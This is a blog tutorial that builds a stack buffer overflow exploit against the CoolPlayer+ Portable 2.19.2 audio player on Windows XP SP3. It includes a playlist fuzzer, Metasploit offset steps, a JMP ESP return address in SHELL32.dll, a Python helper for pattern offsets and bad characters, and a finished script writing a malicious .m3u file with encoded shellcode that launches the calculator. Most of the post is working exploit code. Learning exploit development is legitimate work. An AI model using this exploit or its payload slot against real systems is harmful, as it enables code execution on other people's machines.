Posted by shinigami at 12:54
Today I am learning a buffer overflow in CoolPlayer+ Portable 2.19.2, an audio player for Windows. I need to prepare some tools for exploitation:
- Windows XP SP 3 English
- Ollydbg
- Metasploit
- Geany text editor

First, a small fuzzer that writes a playlist containing one very long entry:

#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
# How to use
# fuzzer.py playme.m3u "\x41" 1000
import sys
filename = sys.argv[1]                                # playlist file to write, e.g. playme.m3u
my_args = sys.argv[2].decode('string_escape')         # byte(s) to repeat; "\x41" on the command line becomes "A"
long_args = int(sys.argv[3])                          # how many times to repeat it
sploit = my_args * long_args
fopen = open(filename, 'w')
fopen.write(sploit)
fopen.close()

Run the fuzzer, open the playlist using CoolPlayer and look at the EIP. The EIP was overwritten.
After overwriting EIP, I need to know exactly which offset in the input lands in EIP.
Use the Metasploit pattern_create tool to generate a unique, non-repeating pattern of the same length:
./pattern_create.rb 1000
Then edit the fuzzer so it writes that pattern instead of the "A"s:

#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = ".....pattern_create......"   # paste the 1000-byte output of pattern_create.rb here
sploit = junk
fopen = open(filename, 'w')
fopen.write(sploit)
fopen.close()
Now re-run the fuzzer. Reopen Ollydbg, attach CoolPlayer and load playme.m3u again.
Look at the EIP, copy the value and look it up with the Metasploit pattern_offset tool:
./pattern_offset.rb 30684139
It returns 209, so the four bytes at offset 209 of the input are the ones that end up in EIP. Now go back to the fuzzer and edit it to look like this:

#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = "\x90" * 209                   # filler up to the saved return address
junk += "\xEF\xBE\xAD\xDE"            # marker value; appears in EIP as DEADBEEF (little-endian)
junk += "\x41" * (1000 - len(junk))   # pad to the same total length as before
sploit = junk
fopen = open(filename, 'w')
fopen.write(sploit)
fopen.close()
Run the fuzzer, restart Olly and CoolPlayer, then load playme.m3u again. Make sure that EIP was overwritten with DEADBEEF; this confirms the offset is correct.
Next we need a module that contains a JMP ESP instruction, so that execution is redirected to the data sitting at ESP (the bytes following the return address).
Click View->Executable Modules and double-click SHELL32.dll. To search for JMP ESP, right-click->Search For->Command and enter JMP ESP. Note the address of the JMP ESP instruction.
Back in the CPU window, click on the ESP value in the registers pane and choose Follow in Dump.
We can see that the space available for the payload is enough for the Execute Command payload, so I will use it.
Generate the payload with Metasploit; the bad characters to exclude are 00, 0a and 0d (the playlist is parsed as text, so a NUL or a line break would cut the entry short).
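As an added example (not part of the original post, and not the Metasploit tools themselves), the following Python 3 script reproduces the two checks used above: it builds the same cyclic pattern that pattern_create.rb emits, recovers the offset from the value seen in EIP the way pattern_offset.rb does (reversing the four bytes because x86 is little-endian), and scans a byte string for the bad characters 00, 0a and 0d. The payload bytes in the usage are constructed for the demonstration.

```python
import string


def cyclic_pattern(length):
    """Build the Metasploit-style pattern Aa0Aa1Aa2...Aa9Ab0... and cut it to `length` bytes.
    Every 4-byte window of this pattern is unique, which is what makes the offset lookup work."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_hex, length=1000):
    """Given the 32-bit value shown in EIP (e.g. '30684139'), return the offset of those
    bytes in the cyclic pattern, or -1 if the value is not part of the pattern.
    The register holds the bytes in little-endian order, so they are reversed first."""
    value = int(eip_hex, 16)
    needle = value.to_bytes(4, "little").decode("ascii", errors="replace")
    return cyclic_pattern(length).find(needle)


def bad_bytes_present(data, bad=(0x00, 0x0A, 0x0D)):
    """Return the sorted list of bad byte values that occur in `data`.
    A playlist is read as text, so NUL and line breaks would truncate the entry."""
    return sorted({b for b in data if b in bad})


if __name__ == "__main__":
    # The value the post reads out of EIP after loading the pattern playlist.
    print("offset of 30684139:", pattern_offset("30684139"))   # 209, matching pattern_offset.rb

    # Constructed sample payloads for the bad-character check (not real shellcode).
    clean = b"\x90" * 16 + b"\xba\x90\x6e\xa9"
    dirty = b"\x90" * 16 + b"\x0a\x41\x00\x42"
    print("bad bytes in clean payload:", bad_bytes_present(clean))   # []
    print("bad bytes in dirty payload:", bad_bytes_present(dirty))   # [0, 10]
```

The offset comes out as 209 because the pattern's bytes 209..212 are "9Ah0", which read as 0x30684139 when loaded into a little-endian register; the same reasoning lets you sanity-check any pattern_offset result by hand.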
#!C:\Python27\python.exe
junk = "\x90" * 209                   # filler up to the saved return address (offset found above)
junk += "\xD7\x30\x9D\x7C"            # JMP ESP in SHELL32.dll (Windows XP SP3), little-endian
junk += "\x90" * 16                   # small NOP sled before the payload
junk += ("\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x32\x83\xc3\x04\x31\x53\x0e\x03\xc3\x60\x4b\xf6\x1f\x94\x02"
"\xf9\xdf\x65\x75\x73\x3a\x54\xa7\xe7\x4f\xc5\x77\x63\x1d\xe6"
"\xfc\x21\xb5\x7d\x70\xee\xba\x36\x3f\xc8\xf5\xc7\xf1\xd4\x59"
"\x0b\x93\xa8\xa3\x58\x73\x90\x6c\xad\x72\xd5\x90\x5e\x26\x8e"
"\xdf\xcd\xd7\xbb\x9d\xcd\xd6\x6b\xaa\x6e\xa1\x0e\x6c\x1a\x1b"
"\x10\xbc\xb3\x10\x5a\x24\xbf\x7f\x7b\x55\x6c\x9c\x47\x1c\x19"
"\x57\x33\x9f\xcb\xa9\xbc\xae\x33\x65\x83\x1f\xbe\x77\xc3\xa7"
"\x21\x02\x3f\xd4\xdc\x15\x84\xa7\x3a\x93\x19\x0f\xc8\x03\xfa"
"\xae\x1d\xd5\x89\xbc\xea\x91\xd6\xa0\xed\x76\x6d\xdc\x66\x79"
"\xa2\x55\x3c\x5e\x66\x3e\xe6\xff\x3f\x9a\x49\xff\x20\x42\x35"
"\xa5\x2b\x60\x22\xdf\x71\xee\xb5\x6d\x0c\x57\xb5\x6d\x0f\xf7"
"\xde\x5c\x84\x98\x99\x60\x4f\xdd\x56\x2b\xd2\x77\xff\xf2\x86"
"\xca\x62\x05\x7d\x08\x9b\x86\x74\xf0\x58\x96\xfc\xf5\x25\x10"
"\xec\x87\x36\xf5\x12\x34\x36\xdc\x70\xdb\xa4\xbc\x76")
sploit = junk
fopen = open("playme.m3u", 'w')
fopen.write(sploit)
fopen.close()

Re-run the fuzzer, open CoolPlayer and load playme.m3u again. CoolPlayer crashes and the calculator appears.